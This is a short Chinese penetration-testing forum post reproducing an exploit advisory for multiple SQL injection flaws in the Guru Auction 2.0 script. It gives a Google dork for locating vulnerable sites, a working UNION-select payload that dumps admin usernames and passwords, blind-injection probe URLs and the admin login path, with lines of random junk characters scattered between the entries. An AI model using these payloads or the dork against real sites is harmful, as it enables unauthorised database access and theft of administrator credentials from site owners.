中国网络渗透测试联盟
标题:
Guru Auction 2.0多重sql注射
[打印本页]
作者:
admin
时间:
2012-12-31 09:24
标题:
Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
: C0 b4 d7 ], R
2 p0 l2 Q/ h7 N1 q2 P6 o
作者 : v3n0m
% h( ^( \- ]2 o! y5 N$ j
应用 : Guru Auction 2.0
# `( }. C- `' f5 z+ X0 ]+ _6 V) J
Price : $49
( h4 Y& z! E' d) X( A
Vendor :
http://www.guruscript.com/
& ?9 R+ Q! K* D$ g \* B
Google Dork : inurl:subcat.php?cate_id=
& }9 j( s: {5 ^: \' h
: P3 ^: n8 T8 I
SQLi p0c:
/ n6 {- P# _; G1 y6 W5 Y
~~~~~~~~~~
% r% w! Z% Q8 d* w+ V: i7 ]
http://domain.tld/
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
0 i& `' x" }* \- K& L( m
* X/ [ \) Z( t4 P! T* h2 g+ T
0 a' P+ P. c) i5 I7 u, G
盲注 p0c:
0 A' n1 W- s* |9 q
~~~~~~~~~~
7 g5 n: o: [4 {, B
http://www.political-security.com
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
' d/ [4 c4 j0 V: ~
http://domain.tld/
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
1 j! {. ^( q/ A; P4 V" e, P4 ?
y( z& Z8 Q3 q
管理登录入口:
4 t' K [' N3 h0 g0 q6 ~
~~~~~~~~~~
: Y2 h% x; \! z j% z
http://domain.tld/
[path]/admin/
, }! A" U$ u1 z3 Q9 B& k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2